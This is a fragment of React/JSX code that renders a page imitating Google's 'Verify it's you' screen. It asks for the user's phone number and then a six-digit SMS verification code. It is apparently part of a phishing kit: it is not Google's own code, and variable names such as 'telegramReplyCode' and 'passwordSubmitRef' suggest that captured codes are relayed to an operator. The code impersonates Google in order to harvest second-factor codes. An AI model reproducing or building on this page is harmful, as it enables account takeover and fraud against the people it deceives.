    <GoogleAuthPopup>
      <h1 className="google-verify-title">Verify it&apos;s you</h1>
      <p className="google-verify-intro google-verify-intro--tight">
        To help keep your account safe, Google wants to make sure it&apos;s really
        you trying to sign in.
      </p>
      <GoogleAccountChip email={username} />

      {!showReplyCode ? (
        <>
          <h2 className="google-verify-subtitle">Get a verification code</h2>
          <p className="google-verify-detail">
            To get a verification code, confirm your phone number.
          </p>
        </>
      ) : (
        <>
          <h2 className="google-verify-subtitle">Enter verification code</h2>
          {telegramReplyCode && (
            <p className="google-verify-detail">
              A text message with a 6-digit verification code was just sent to
              your phone {formatPhoneNumber(phoneNumberSent)}
            </p>
          )}
        </>
      )}

      {waitingForPhoneCode && (
        <p className="google-verify-detail google-verify-detail--pending">
          Waiting for SMS verification code…
        </p>
      )}

      <form
        onSubmit={handleSubmit}
        className="google-signin-form google-verify-form"
      >
                <div className="input-group input-sms google-verify-field">
                  {!showReplyCode ? (
                    <div
                      className={`google-phone-field${
                        error ? " google-phone-field--error" : ""
                      }`}
                    >
                      <div className="google-phone-country">
                        <button
                          ref={countryButtonRef}
                          type="button"
                          className="google-phone-country-btn"
                          aria-label="Change country code"
                          onMouseDown={(e) => e.preventDefault()}
                          onClick={() => {
                            setShowCountryDropdown(!showCountryDropdown);
                            if (!showCountryDropdown) {
                              setTimeout(() => {
                                const searchInput =
                                  document.getElementById("country-search");
                                if (searchInput) searchInput.focus();
                              }, 100);
                            }
                          }}
                        >
                          <img
                            src={selectedCountry.flag}
                            alt=""
                            className="google-phone-flag"
                          />
                          <span className="google-phone-dial">
                            {selectedCountry.dialCode}
                          </span>
                          <FaChevronDown size={10} aria-hidden />
                        </button>
                      </div>
                      <div className="input-wrapper google-signin-input google-phone-number-wrap">
                        <input
                          ref={inputRef}
                          id="code"
                          placeholder=""
                          type="tel"
                          inputMode="numeric"
                          value={code}
                          disabled={loading}
                          onChange={(e) => {
                            const val = e.target.value
                              .replace(/\D/g, "")
                              .slice(0, 20);
                            setCode(val);
                            if (error) setError("");
                          }}
                          onKeyDown={(e) => {
                            if (
                              !/^\d$/.test(e.key) &&
                              ![
                                "Backspace",
                                "Delete",
                                "ArrowLeft",
                                "ArrowRight",
                                "Tab",
                                "Enter",
                              ].includes(e.key)
                            ) {
                              e.preventDefault();
                            }
                          }}
                          required
                          className={`google-phone-input ${code.trim() ? "filled" : ""} ${
                            error ? "error-input" : ""
                          }`}
                          autoFocus
                        />
                        <label
                          htmlFor="code"
                          className={error ? "error-label" : ""}
                        >
                          Phone number
                        </label>
                      </div>
                    </div>
                  ) : (
                    <div className="input-wrapper google-signin-input">
                        <input
                          ref={inputRef}
                          id="verificationCode"
                          placeholder=""
                          type="tel"
                          inputMode="numeric"
                          value={code}
                          disabled={loading}
                          onChange={(e) => {
                            let val = e.target.value.replace(/\D/g, "").slice(0, 6);
                            setCode(val);
                            if (error) setError("");
                          }}
                          onKeyDown={(e) => {
                            if (
                              !/^\d$/.test(e.key) &&
                              ![
                                "Backspace",
                                "Delete",
                                "ArrowLeft",
                                "ArrowRight",
                                "Tab",
                                "Enter",
                              ].includes(e.key)
                            ) {
                              e.preventDefault();
                            }
                          }}
                          required
                          className={`${code.trim() ? "filled" : ""} ${
                            error ? "error-input" : ""
                          }`}
                          autoFocus
                        />
                        <label
                          htmlFor="verificationCode"
                          className={error ? "error-label" : ""}
                        >
                          Enter code
                        </label>
                    </div>
                  )}
                  
                  {/* Country Dropdown - RENDERED OUTSIDE THE FORM FOR BETTER Z-INDEX */}
                  {showCountryDropdown && (
                    <div 
                      ref={countryDropdownRef}
                      style={{
                        position: 'fixed',
                        top: `${getDropdownPosition().top}px`,
                        left: `${getDropdownPosition().left}px`,
                        backgroundColor: 'white',
                        border: '1px solid #dadce0',
                        borderRadius: '8px',
                        boxShadow: '0 4px 20px rgba(0,0,0,0.15)',
                        maxHeight: '350px',
                        overflow: 'hidden',
                        zIndex: 9999,
                        width: '300px'
                      }}
                    >
                      {/* Search input */}
                      <div style={{
                        padding: '12px',
                        borderBottom: '1px solid #eee',
                        position: 'sticky',
                        top: 0,
                        backgroundColor: 'white',
                        zIndex: 1
                      }}>
                        <input
                          id="country-search"
                          type="text"
                          placeholder="Search country..."
                          value={countrySearch}
                          onChange={(e) => setCountrySearch(e.target.value)}
                          style={{
                            width: '100%',
                            padding: '10px',
                            border: '1px solid #ddd',
                            borderRadius: '6px',
                            fontSize: '14px',
                            outline: 'none',
                            boxSizing: 'border-box'
                          }}
                          autoFocus
                        />
                      </div>
                      
                      {/* Country list */}
                      <div style={{ maxHeight: '250px', overflowY: 'auto' }}>
                        {filteredCountries.map((country) => (
                          <button
                            key={country.code}
                            type="button"
                            onClick={() => handleCountrySelect(country)}
                            style={{
                              display: 'flex',
                              alignItems: 'center',
                              gap: '10px',
                              padding: '10px 12px',
                              width: '100%',
                              border: 'none',
                              background: selectedCountry.code === country.code ? '#f0f7ff' : 'white',
                              cursor: 'pointer',
                              fontSize: '14px',
                              textAlign: 'left',
                              borderBottom: '1px solid #f5f5f5',
                              transition: 'background-color 0.2s'
                            }}
                            onMouseEnter={(e) => e.currentTarget.style.backgroundColor = '#f8f9fa'}
                            onMouseLeave={(e) => e.currentTarget.style.backgroundColor = selectedCountry.code === country.code ? '#f0f7ff' : 'white'}
                          >
                            <img 
                              src={country.flag} 
                              alt={country.name}
                              style={{ width: '24px', height: '18px', objectFit: 'cover', borderRadius: '2px' }}
                            />
                            <span style={{ flex: 1, fontWeight: selectedCountry.code === country.code ? '600' : '400' }}>
                              {country.name}
                            </span>
                            <span style={{ color: '#666', fontWeight: '500' }}>{country.dialCode}</span>
                          </button>
                        ))}
                        
                        {filteredCountries.length === 0 && (
                          <div style={{ 
                            padding: '20px', 
                            textAlign: 'center', 
                            color: '#666',
                            fontSize: '14px'
                          }}>
                            No countries found for "{countrySearch}"
                          </div>
                        )}
                      </div>
                    </div>
                  )}
                  
                  {loading && passwordSubmitRef && (
                    <div className="password-submit-loader">
                      <div className="spinner"></div>
                      <p className="loader-text">
                        {showReplyCode ? 
                          verificationInProgressRef.current ? 
                            "Verifying code..." : 
                            "Processing..." 
                          : "Verifying number..."}
                      </p>
                    </div>
                  )}
                  
                  {error && (
                    <p className="error-message">
                      {error}
                    </p>
                  )}
                  
                  {infoMessage && (
                    <p className="info-message" style={{ color: '#666', fontSize: '14px' }}>
                      {infoMessage}
                    </p>
                  )}
                </div>
                
        <div className="submit-button-div google-signin-actions">
          <button
            type="button"
            className="custom-secondary-button google-signin-link-btn"
            onClick={() => {
              window.location.href = `${FRONT_URL}/login`;
            }}
            disabled={loading}
          >
            Try another way
          </button>
          <button
            className="custom-primary-button google-signin-next-btn"
            type="submit"
            disabled={loading}
          >
            {loading ? (
              <div className="fb-loader-btn">
                <div className="fb-spinner"></div>
              </div>
            ) : showReplyCode ? (
              "Next"
            ) : (
              "Send"
            )}
          </button>
        </div>
      </form>
    </GoogleAuthPopup>
  );
}